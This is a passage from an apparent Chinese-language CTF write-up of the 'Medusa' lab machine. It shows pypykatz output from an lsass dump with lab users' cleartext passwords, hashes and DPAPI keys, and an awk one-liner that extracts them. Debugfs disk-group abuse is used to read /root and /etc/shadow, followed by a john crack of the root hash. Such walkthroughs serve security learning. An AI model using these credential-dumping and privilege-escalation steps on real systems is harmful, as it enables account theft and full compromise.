     domainname Medusa-PC
     password p0w3rf1ll_abc
     password (hex)70003000770033007200660031006c006c005f00610062006300000000000000

== LogonSession ==
authentication_id 1977311 (1e2bdf)
session_id 15
username alienum
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:03:15.227148+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1018
luid 1977311
 == MSV ==
     Username: alienum
     Domain: Medusa-PC
     LM: ca68f3f2af89ee409b93859eb9628cfa
     NT: f430978744f1846424852b47c4ee8a10
     SHA1: 4c8c55d87f86d95146afd0fe1437d1d71384a15f
     DPAPI: NA
 == WDIGEST [1e2bdf]==
     username alienum
     domainname Medusa-PC
     password 4l13num_qwerty
     password (hex)34006c00310033006e0075006d005f0071007700650072007400790000000000
 == Kerberos ==
     Username: alienum
     Domain: Medusa-PC
     Password: 4l13num_qwerty
     password (hex)34006c00310033006e0075006d005f0071007700650072007400790000000000
 == WDIGEST [1e2bdf]==
     username alienum
     domainname Medusa-PC
     password 4l13num_qwerty
     password (hex)34006c00310033006e0075006d005f0071007700650072007400790000000000
 == TSPKG [1e2bdf]==
     username alienum
     domainname Medusa-PC
     password 4l13num_qwerty
     password (hex)34006c00310033006e0075006d005f0071007700650072007400790000000000

== LogonSession ==
authentication_id 1881308 (1cb4dc)
session_id 14
username Claor
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:02:32.235938+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1006
luid 1881308
 == MSV ==
     Username: Claor
     Domain: Medusa-PC
     LM: NA
     NT: 7f62b734f90db005c14454d0e7982bf2
     SHA1: 70cb75925c8a0b5825faaa344e9252ba9c23fa41
     DPAPI: NA
 == WDIGEST [1cb4dc]==
     username Claor
     domainname Medusa-PC
     password n0s_v0lv1m0s_4_1lusi0n4r
     password (hex)6e00300073005f00760030006c00760031006d00300073005f0034005f0031006c0075007300690030006e0034007200
 == Kerberos ==
     Username: Claor
     Domain: Medusa-PC
     Password: n0s_v0lv1m0s_4_1lusi0n4r
     password (hex)6e00300073005f00760030006c00760031006d00300073005f0034005f0031006c0075007300690030006e0034007200
 == WDIGEST [1cb4dc]==
     username Claor
     domainname Medusa-PC
     password n0s_v0lv1m0s_4_1lusi0n4r
     password (hex)6e00300073005f00760030006c00760031006d00300073005f0034005f0031006c0075007300690030006e0034007200
 == TSPKG [1cb4dc]==
     username Claor
     domainname Medusa-PC
     password n0s_v0lv1m0s_4_1lusi0n4r
     password (hex)6e00300073005f00760030006c00760031006d00300073005f0034005f0031006c0075007300690030006e0034007200

== LogonSession ==
authentication_id 1785900 (1b402c)
session_id 13
username Pr0xy
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:01:16.137305+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1017
luid 1785900
 == MSV ==
     Username: Pr0xy
     Domain: Medusa-PC
     LM: NA
     NT: ba26a9d6f4cf057e1652257963729d49
     SHA1: 802991035ea1acf65584c004f34a72902a0e609c
     DPAPI: NA
 == WDIGEST [1b402c]==
     username Pr0xy
     domainname Medusa-PC
     password pr0xy_ch41ns_456
     password (hex)700072003000780079005f0063006800340031006e0073005f00340035003600
 == Kerberos ==
     Username: Pr0xy
     Domain: Medusa-PC
     Password: pr0xy_ch41ns_456
     password (hex)700072003000780079005f0063006800340031006e0073005f00340035003600
 == WDIGEST [1b402c]==
     username Pr0xy
     domainname Medusa-PC
     password pr0xy_ch41ns_456
     password (hex)700072003000780079005f0063006800340031006e0073005f00340035003600
 == TSPKG [1b402c]==
     username Pr0xy
     domainname Medusa-PC
     password pr0xy_ch41ns_456
     password (hex)700072003000780079005f0063006800340031006e0073005f00340035003600

== LogonSession ==
authentication_id 1692880 (19d4d0)
session_id 12
username nolo
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T14:00:28.298438+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1019
luid 1692880
 == MSV ==
     Username: nolo
     Domain: Medusa-PC
     LM: 580bb7781b7384e43463667f1a71e97a
     NT: d54fc8d1a368eab7bee473b8c7b93748
     SHA1: 50908cf3b351621d70f7e55e9ca92c37b0a5990d
     DPAPI: NA
 == WDIGEST [19d4d0]==
     username nolo
     domainname Medusa-PC
     password littl3_h4ck3r
     password (hex)6c006900740074006c0033005f006800340063006b0033007200000000000000
 == Kerberos ==
     Username: nolo
     Domain: Medusa-PC
     Password: littl3_h4ck3r
     password (hex)6c006900740074006c0033005f006800340063006b0033007200000000000000
 == WDIGEST [19d4d0]==
     username nolo
     domainname Medusa-PC
     password littl3_h4ck3r
     password (hex)6c006900740074006c0033005f006800340063006b0033007200000000000000
 == TSPKG [19d4d0]==
     username nolo
     domainname Medusa-PC
     password littl3_h4ck3r
     password (hex)6c006900740074006c0033005f006800340063006b0033007200000000000000

== LogonSession ==
authentication_id 1381468 (15145c)
session_id 11
username numero6
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:59:06.967383+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1021
luid 1381468
 == MSV ==
     Username: numero6
     Domain: Medusa-PC
     LM: 3a9514532e68d1ade189cb5bf02b24bb
     NT: e28f0fd696fb69d3317f1927c9e8d15c
     SHA1: 8295426605ff734e2bf256b630d905983dd929b5
     DPAPI: NA
 == WDIGEST [15145c]==
     username numero6
     domainname Medusa-PC
     password n1mb3r_s1x
     password (hex)6e0031006d006200330072005f0073003100780000000000
 == Kerberos ==
     Username: numero6
     Domain: Medusa-PC
     Password: n1mb3r_s1x
     password (hex)6e0031006d006200330072005f0073003100780000000000
 == WDIGEST [15145c]==
     username numero6
     domainname Medusa-PC
     password n1mb3r_s1x
     password (hex)6e0031006d006200330072005f0073003100780000000000
 == TSPKG [15145c]==
     username numero6
     domainname Medusa-PC
     password n1mb3r_s1x
     password (hex)6e0031006d006200330072005f0073003100780000000000
 == DPAPI [15145c]==
     luid 1381468
     key_guid 05667fe6-e6a1-4e5d-ab98-d9ea9682dcf7
     masterkey 2bae1dc400a32522b6efe39fe24d7c253dc8c74bd1dfb890699f940be9a79fd6d6ef465cef7d0af4c70c9fa335065b178dd8cdbfa60f3dcd62e3e88d22521f2a
     sha1_masterkey ed4fb77971f735932fee0e9efd584e6d1bfb01e8

== LogonSession ==
authentication_id 1298068 (13ce94)
session_id 10
username ct0l4
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:58:42.033789+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1010
luid 1298068
 == MSV ==
     Username: ct0l4
     Domain: Medusa-PC
     LM: NA
     NT: c9bb6fbc746633a84652119bf544ebe3
     SHA1: 82848b1644602bd6a500625b37fd8ed14807fda8
     DPAPI: NA
 == WDIGEST [13ce94]==
     username ct0l4
     domainname Medusa-PC
     password b4ck3nd_pr0gr4m3r
     password (hex)6200340063006b0033006e0064005f007000720030006700720034006d0033007200000000000000
 == Kerberos ==
     Username: ct0l4
     Domain: Medusa-PC
     Password: b4ck3nd_pr0gr4m3r
     password (hex)6200340063006b0033006e0064005f007000720030006700720034006d0033007200000000000000
 == WDIGEST [13ce94]==
     username ct0l4
     domainname Medusa-PC
     password b4ck3nd_pr0gr4m3r
     password (hex)6200340063006b0033006e0064005f007000720030006700720034006d0033007200000000000000
 == TSPKG [13ce94]==
     username ct0l4
     domainname Medusa-PC
     password b4ck3nd_pr0gr4m3r
     password (hex)6200340063006b0033006e0064005f007000720030006700720034006d0033007200000000000000

== LogonSession ==
authentication_id 1000050 (f4272)
session_id 9
username LordP4
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:57:52.044531+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1020
luid 1000050
 == MSV ==
     Username: LordP4
     Domain: Medusa-PC
     LM: 787465d75fac19613c442716b42e315b
     NT: 4aef2b11d1bb6c7594c904035f611937
     SHA1: 3f872737266578b9c6678f42ae1fadc19f34b523
     DPAPI: NA
 == WDIGEST [f4272]==
     username LordP4
     domainname Medusa-PC
     password Wh1t3_h4ck
     password (hex)570068003100740033005f006800340063006b0000000000
 == Kerberos ==
     Username: LordP4
     Domain: Medusa-PC
     Password: Wh1t3_h4ck
     password (hex)570068003100740033005f006800340063006b0000000000
 == WDIGEST [f4272]==
     username LordP4
     domainname Medusa-PC
     password Wh1t3_h4ck
     password (hex)570068003100740033005f006800340063006b0000000000
 == TSPKG [f4272]==
     username LordP4
     domainname Medusa-PC
     password Wh1t3_h4ck
     password (hex)570068003100740033005f006800340063006b0000000000
 == DPAPI [f4272]==
     luid 1000050
     key_guid 5062c530-69ce-4bc9-8272-9db84b775b3c
     masterkey 6f53397764e60e283d112ce7da1b9425fced09e213b8c02044f28f9146928c8c91f5ddc7b586faa3d6b5896cd3ffd8f07991187ab9061ab32f111cdf3641f4e2
     sha1_masterkey 1c8549da2ab13f26fe19d46bfafbccb6b518c96a

== LogonSession ==
authentication_id 933125 (e3d05)
session_id 8
username sml
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:57:13.015234+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1014
luid 933125
 == MSV ==
     Username: sml
     Domain: Medusa-PC
     LM: 92cae3307cc9b39593e28745b8bf4ba6
     NT: 37da1ddba9ebe6b1b36651fd5280c6af
     SHA1: 4b1f807db4643e6529e1e591b572435384743e2d
     DPAPI: NA
 == WDIGEST [e3d05]==
     username sml
     domainname Medusa-PC
     password th3_b0ss
     password (hex)7400680033005f006200300073007300
 == Kerberos ==
     Username: sml
     Domain: Medusa-PC
     Password: th3_b0ss
     password (hex)7400680033005f006200300073007300
 == WDIGEST [e3d05]==
     username sml
     domainname Medusa-PC
     password th3_b0ss
     password (hex)7400680033005f006200300073007300
 == TSPKG [e3d05]==
     username sml
     domainname Medusa-PC
     password th3_b0ss
     password (hex)7400680033005f006200300073007300

== LogonSession ==
authentication_id 845877 (ce835)
session_id 7
username spectre
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:56:09.715430+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1004
luid 845877
 == MSV ==
     Username: spectre
     Domain: Medusa-PC
     LM: NA
     NT: 6ec779920e220c163f33101085eff0b9
     SHA1: 4d3341113c66127df14de8cc6ac7b4ebf52d74b5
     DPAPI: NA
 == WDIGEST [ce835]==
     username spectre
     domainname Medusa-PC
     password 5p3ctr3_p0is0n_xX
     password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000
 == Kerberos ==
     Username: spectre
     Domain: Medusa-PC
     Password: 5p3ctr3_p0is0n_xX
     password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000
 == WDIGEST [ce835]==
     username spectre
     domainname Medusa-PC
     password 5p3ctr3_p0is0n_xX
     password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000
 == TSPKG [ce835]==
     username spectre
     domainname Medusa-PC
     password 5p3ctr3_p0is0n_xX
     password (hex)35007000330063007400720033005f00700030006900730030006e005f0078005800000000000000

== LogonSession ==
authentication_id 763754 (ba76a)
session_id 6
username RiJaba1
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:55:03.742773+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1003
luid 763754
 == MSV ==
     Username: RiJaba1
     Domain: Medusa-PC
     LM: NA
     NT: 139988f1c9a8a7cb6fb03762a6d510e7
     SHA1: ff33ab3051fc5bc0fafd7d1c266c062136a1f266
     DPAPI: NA
 == WDIGEST [ba76a]==
     username RiJaba1
     domainname Medusa-PC
     password littl3_h4ck3r_v2
     password (hex)6c006900740074006c0033005f006800340063006b00330072005f0076003200
 == Kerberos ==
     Username: RiJaba1
     Domain: Medusa-PC
     Password: littl3_h4ck3r_v2
     password (hex)6c006900740074006c0033005f006800340063006b00330072005f0076003200
 == WDIGEST [ba76a]==
     username RiJaba1
     domainname Medusa-PC
     password littl3_h4ck3r_v2
     password (hex)6c006900740074006c0033005f006800340063006b00330072005f0076003200
 == TSPKG [ba76a]==
     username RiJaba1
     domainname Medusa-PC
     password littl3_h4ck3r_v2
     password (hex)6c006900740074006c0033005f006800340063006b00330072005f0076003200

== LogonSession ==
authentication_id 682065 (a6851)
session_id 5
username jabatron
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:54:24.123633+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1008
luid 682065
 == MSV ==
     Username: jabatron
     Domain: Medusa-PC
     LM: 162b58d2300279d1b7f036d77017ce3e
     NT: 362e83945feaa2c874f39b670ef27deb
     SHA1: 60cd5410d0cf4659d2b6012e134ebb989a37a241
     DPAPI: NA
 == WDIGEST [a6851]==
     username jabatron
     domainname Medusa-PC
     password b1zum_3_AM
     password (hex)620031007a0075006d005f0033005f0041004d0000000000
 == Kerberos ==
     Username: jabatron
     Domain: Medusa-PC
     Password: b1zum_3_AM
     password (hex)620031007a0075006d005f0033005f0041004d0000000000
 == WDIGEST [a6851]==
     username jabatron
     domainname Medusa-PC
     password b1zum_3_AM
     password (hex)620031007a0075006d005f0033005f0041004d0000000000
 == TSPKG [a6851]==
     username jabatron
     domainname Medusa-PC
     password b1zum_3_AM
     password (hex)620031007a0075006d005f0033005f0041004d0000000000

== LogonSession ==
authentication_id 601672 (92e48)
session_id 4
username InfayerTS
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:52:52.583594+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1011
luid 601672
 == MSV ==
     Username: InfayerTS
     Domain: Medusa-PC
     LM: 09b8d9346bc2c8435c7e856a3bfa37de
     NT: 46a5b2901a6db08a0cb93a04dc6c1949
     SHA1: e0fab5eb95b7c356da9a8f4f0239b1a510fd12c6
     DPAPI: NA
 == WDIGEST [92e48]==
     username InfayerTS
     domainname Medusa-PC
     password UnD3sc0n0c1d0
     password (hex)55006e00440033007300630030006e0030006300310064003000000000000000
 == Kerberos ==
     Username: InfayerTS
     Domain: Medusa-PC
     Password: UnD3sc0n0c1d0
     password (hex)55006e00440033007300630030006e0030006300310064003000000000000000
 == WDIGEST [92e48]==
     username InfayerTS
     domainname Medusa-PC
     password UnD3sc0n0c1d0
     password (hex)55006e00440033007300630030006e0030006300310064003000000000000000
 == TSPKG [92e48]==
     username InfayerTS
     domainname Medusa-PC
     password UnD3sc0n0c1d0
     password (hex)55006e00440033007300630030006e0030006300310064003000000000000000

== LogonSession ==
authentication_id 526374 (80826)
session_id 3
username d4t4s3c
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:52:02.861914+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1013
luid 526374
 == MSV ==
     Username: d4t4s3c
     Domain: Medusa-PC
     LM: 375262b6e52fb3710decb7ba03fdea49
     NT: 6dd06920b7a4203d195f9f05084d6cb6
     SHA1: 65b498805e94b4546396f8bd7a9ee093e85f1594
     DPAPI: NA
 == WDIGEST [80826]==
     username d4t4s3c
     domainname Medusa-PC
     password br4in_br34k3r
     password (hex)62007200340069006e005f0062007200330034006b0033007200000000000000
 == Kerberos ==
     Username: d4t4s3c
     Domain: Medusa-PC
     Password: br4in_br34k3r
     password (hex)62007200340069006e005f0062007200330034006b0033007200000000000000
 == WDIGEST [80826]==
     username d4t4s3c
     domainname Medusa-PC
     password br4in_br34k3r
     password (hex)62007200340069006e005f0062007200330034006b0033007200000000000000
 == TSPKG [80826]==
     username d4t4s3c
     domainname Medusa-PC
     password br4in_br34k3r
     password (hex)62007200340069006e005f0062007200330034006b0033007200000000000000

== LogonSession ==
authentication_id 424519 (67a47)
session_id 2
username cromiphi
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:50:58.337500+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1005
luid 424519
 == MSV ==
     Username: cromiphi
     Domain: Medusa-PC
     LM: NA
     NT: e16a94ce4337564fbd00672ac12367fc
     SHA1: 4905a08610106fda3be33780dd1384a3fa326c4b
     DPAPI: NA
 == WDIGEST [67a47]==
     username cromiphi
     domainname Medusa-PC
     password br4in_br34k3r_v2
     password (hex)62007200340069006e005f0062007200330034006b00330072005f0076003200
 == Kerberos ==
     Username: cromiphi
     Domain: Medusa-PC
     Password: br4in_br34k3r_v2
     password (hex)62007200340069006e005f0062007200330034006b00330072005f0076003200
 == WDIGEST [67a47]==
     username cromiphi
     domainname Medusa-PC
     password br4in_br34k3r_v2
     password (hex)62007200340069006e005f0062007200330034006b00330072005f0076003200
 == TSPKG [67a47]==
     username cromiphi
     domainname Medusa-PC
     password br4in_br34k3r_v2
     password (hex)62007200340069006e005f0062007200330034006b00330072005f0076003200

== LogonSession ==
authentication_id 121589 (1daf5)
session_id 1
username Medusa
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:39:39.941406+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1001
luid 121589
 == MSV ==
     Username: Medusa
     Domain: Medusa-PC
     LM: 44efce164ab921caaad3b435b51404ee
     NT: 32ed87bdb5fdc5e9cba88547376818d4
     SHA1: 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
     DPAPI: NA
 == WDIGEST [1daf5]==
     username Medusa
     domainname Medusa-PC
     password 123456
     password (hex)31003200330034003500360000000000
 == Kerberos ==
     Username: Medusa
     Domain: Medusa-PC
     Password: 123456
     password (hex)31003200330034003500360000000000
 == WDIGEST [1daf5]==
     username Medusa
     domainname Medusa-PC
     password 123456
     password (hex)31003200330034003500360000000000
 == TSPKG [1daf5]==
     username Medusa
     domainname Medusa-PC
     password 123456
     password (hex)31003200330034003500360000000000

== LogonSession ==
authentication_id 121543 (1dac7)
session_id 1
username Medusa
domainname Medusa-PC
logon_server MEDUSA-PC
logon_time 2023-01-17T13:39:39.941406+00:00
sid S-1-5-21-1556941724-2101079873-2087351601-1001
luid 121543
 == MSV ==
     Username: Medusa
     Domain: Medusa-PC
     LM: 44efce164ab921caaad3b435b51404ee
     NT: 32ed87bdb5fdc5e9cba88547376818d4
     SHA1: 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
     DPAPI: NA
 == WDIGEST [1dac7]==
     username Medusa
     domainname Medusa-PC
     password 123456
     password (hex)31003200330034003500360000000000
 == Kerberos ==
     Username: Medusa
     Domain: Medusa-PC
     Password: 123456
     password (hex)31003200330034003500360000000000
 == WDIGEST [1dac7]==
     username Medusa
     domainname Medusa-PC
     password 123456
     password (hex)31003200330034003500360000000000
 == TSPKG [1dac7]==
     username Medusa
     domainname Medusa-PC
     password 123456
     password (hex)31003200330034003500360000000000

== LogonSession ==
authentication_id 96251 (177fb)
session_id 0
username ANONYMOUS LOGON
domainname NT AUTHORITY
logon_server
logon_time 2023-01-17T13:39:17.902344+00:00
sid S-1-5-7
luid 96251

== LogonSession ==
authentication_id 997 (3e5)
session_id 0
username SERVICIO LOCAL
domainname NT AUTHORITY
logon_server
logon_time 2023-01-17T13:39:16.843750+00:00
sid S-1-5-19
luid 997
 == Kerberos ==
     Username:
     Domain:

== LogonSession ==
authentication_id 996 (3e4)
session_id 0
username MEDUSA-PC$
domainname WORKGROUP
logon_server
logon_time 2023-01-17T13:39:16.828125+00:00
sid S-1-5-20
luid 996
 == WDIGEST [3e4]==
     username MEDUSA-PC$
     domainname WORKGROUP
     password None
     password (hex)
 == Kerberos ==
     Username: medusa-pc$
     Domain: WORKGROUP
 == WDIGEST [3e4]==
     username MEDUSA-PC$
     domainname WORKGROUP
     password None
     password (hex)

== LogonSession ==
authentication_id 23426 (5b82)
session_id 0
username
domainname
logon_server
logon_time 2023-01-17T13:39:16.734375+00:00
sid None
luid 23426

== LogonSession ==
authentication_id 999 (3e7)
session_id 0
username MEDUSA-PC$
domainname WORKGROUP
logon_server
logon_time 2023-01-17T13:39:16.718750+00:00
sid S-1-5-18
luid 999
 == WDIGEST [3e7]==
     username MEDUSA-PC$
     domainname WORKGROUP
     password None
     password (hex)
 == Kerberos ==
     Username: medusa-pc$
     Domain: WORKGROUP
 == WDIGEST [3e7]==
     username MEDUSA-PC$
     domainname WORKGROUP
     password None
     password (hex)
 == DPAPI [3e7]==
     luid 999
     key_guid c005befa-c2f2-4f70-bce6-9199e1b3d537
     masterkey 1b9c89f8747b31e23126511d184effa733f09c0425e813e4665825ae711043d75cd33d21718256b4f002b11e9b7ce8beba3a4d0d1524f64ae07c5b11450393ed
     sha1_masterkey 063fc03a751363d0b597b119a554c505d50d79fc
 == DPAPI [3e7]==
     luid 999
     key_guid 4ec4ace1-da38-4c23-b8bc-311167afd57a
     masterkey 3e15960063b911f90ac5b696d08f049475736477a581d9bd878a348866d29fb8c4b1e07a2de410240676b55460681c876e9ef23ce64ba3bb6a84a72fbcd0fb17
     sha1_masterkey 599b49e8537fa1be1dbd88441989ae8d4bd4054d
 == DPAPI [3e7]==
     luid 999
     key_guid 4834d175-165a-48f4-9ecc-fb22225c3972
     masterkey ea21228b08295250eb17cc72fb17926fca02688a4ce2542889bf2ee0908d615160e234f19c4964d0d31c58a5a74df4a1152f5328049b65090e887b78f9371bfd
     sha1_masterkey 28594cfa5204bc52e36106051cd28ab896522920
 == DPAPI [3e7]==
     luid 999
     key_guid f22e410f-f947-4e08-8f2a-8f65df603f8d
     masterkey 19c05880b67d50f8231cd8009836e3cdc55610e4877f8b976abd5ca15600d0e759934324c6204b56f02527039e7fc52a1dfb5296d3381aaa7c3eb610dffa32fa
     sha1_masterkey b859b2b52e7e49cf5c70069745c88853c4b23487

在logon session找到了用户spectre的密码

1
2
3

username spectre
domainname Medusa-PC
password 5p3ctr3_p0is0n_xX

或者利用GPT处理一下文本，说实话这个文本处理挺复杂的😅

❯ pypykatz lsa minidump lsass.DMP |awk '/username|password/ && !/password \(hex\)/ {gsub(/^[ \t]+/, "", $0); if ($1 == "username" && !seen[$2]++) {user=$2; print $1, $2} else if ($1 == "password" && !pass[user, $2]++) print $1, $2}'
INFO:pypykatz:Parsing file lsass.DMP
username avijneyam
password 4v1jn3y4m_zxc
username shelldredd
password t0p_s3cr3t
username powerful
password p0w3rf1ll_abc
username alienum
password 4l13num_qwerty
username Claor
password n0s_v0lv1m0s_4_1lusi0n4r
username Pr0xy
password pr0xy_ch41ns_456
username nolo
password littl3_h4ck3r
username numero6
password n1mb3r_s1x
username ct0l4
password b4ck3nd_pr0gr4m3r
username LordP4
password Wh1t3_h4ck
username sml
password th3_b0ss
username spectre
password 5p3ctr3_p0is0n_xX
username RiJaba1
password littl3_h4ck3r_v2
username jabatron
password b1zum_3_AM
username InfayerTS
password UnD3sc0n0c1d0
username d4t4s3c
password br4in_br34k3r
username cromiphi
password br4in_br34k3r_v2
username Medusa
password 123456
username ANONYMOUS
username SERVICIO
username MEDUSA-PC$
password None
username
password None

尝试切换用户登录一下

(remote) www-data@medusa:/...$ su spectre
Password:
spectre@medusa:/...$ cd ~
spectre@medusa:~$ cat user.txt
good job!

487a5d1ce02c53fbf60c3abd300d9ff5

Root提权

发现用户spectre拥有disk权限组

有趣的群组 - Linux Privesc - HackTricks

1 2	spectre@medusa:~$ id uid=1000(spectre) gid=1000(spectre) groups=1000(spectre),6(disk),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)

查看根目录在哪个设备下

spectre@medusa:~$ df -h
Filesystem      Size  Used Avail Use% Mounted on
/dev/sda1       6.9G  2.4G  4.2G  36% /
udev            471M     0  471M   0% /dev
tmpfs           489M     0  489M   0% /dev/shm
tmpfs            98M  508K   98M   1% /run
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs            98M     0   98M   0% /run/user/1000

本来是想修改passwd文件的，结果报错没权限

那直接读flag就行了

spectre@medusa:~$ debugfs -w /dev/sda1
debugfs 1.46.2 (28-Feb-2021)
debugfs:  dump /home/spectre/passwd /etc/passwd
dump: Permission denied while opening /etc/passwd for dump_inode
debugfs:  ls /root
debugfs:  cat /root/.rO0t.txt
congrats hacker :)

34b1e6fc5e7fe0bfd56ed4b8776c9f5b
debugfs:

不过倒是可以读shadow，拿到hash爆破一下，碰碰运气

得到root密码andromeda

spectre@medusa:~$ debugfs /dev/sda1
debugfs 1.46.2 (28-Feb-2021)
debugfs:  cat /etc/shadow
root:$y$j9T$AjVXCCcjJ6jTodR8BwlPf.$4NeBwxOq4X0/0nCh3nrIBmwEEHJ6/kDU45031VFCWc2:19375:0:99999:7:::
daemon:*:19372:0:99999:7:::
bin:*:19372:0:99999:7:::
sys:*:19372:0:99999:7:::
sync:*:19372:0:99999:7:::
games:*:19372:0:99999:7:::
man:*:19372:0:99999:7:::
lp:*:19372:0:99999:7:::
mail:*:19372:0:99999:7:::
news:*:19372:0:99999:7:::
uucp:*:19372:0:99999:7:::
proxy:*:19372:0:99999:7:::
www-data:*:19372:0:99999:7:::
backup:*:19372:0:99999:7:::
list:*:19372:0:99999:7:::
irc:*:19372:0:99999:7:::
gnats:*:19372:0:99999:7:::
nobody:*:19372:0:99999:7:::
_apt:*:19372:0:99999:7:::
systemd-network:*:19372:0:99999:7:::
systemd-resolve:*:19372:0:99999:7:::
messagebus:*:19372:0:99999:7:::
systemd-timesync:*:19372:0:99999:7:::
sshd:*:19372:0:99999:7:::
spectre:$y$j9T$4TeFHbjRqRC9royagYTTJ/$KnU7QK1u0/5fpHHqE/ehPe6uqpwbs6vuvcQQH4EF9ZB:19374:0:99999:7:::
systemd-coredump:!*:19372::::::
ftp:*:19372:0:99999:7:::
----------------------------分隔--------
❯ vi hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
andromeda        (root)
1g 0:00:00:09 DONE (2025-02-22 17:39) 0.1016g/s 380.4p/s 380.4c/s 380.4C/s 19871987..street
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
spectre@medusa:~$ su root
Password:
root@medusa:/home/spectre# cd ~
root@medusa:~# ls -al
total 28
drwx------  3 root root 4096 Jan 30  2023 .
drwxr-xr-x 19 root root 4096 Jan 15  2023 ..
lrwxrwxrwx  1 root root    9 Jan 15  2023 .bash_history -> /dev/null
-rw-r--r--  1 root root 3526 Jan 17  2023 .bashrc
drwxr-xr-x  3 root root 4096 Jan 15  2023 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r--r--  1 root root   53 Jan 18  2023 .rO0t.txt
-rw-r--r--  1 root root   66 Jan 30  2023 .selected_editor
root@medusa:~# cat .rO0t.txt
congrats hacker :)

34b1e6fc5e7fe0bfd56ed4b8776c9f5b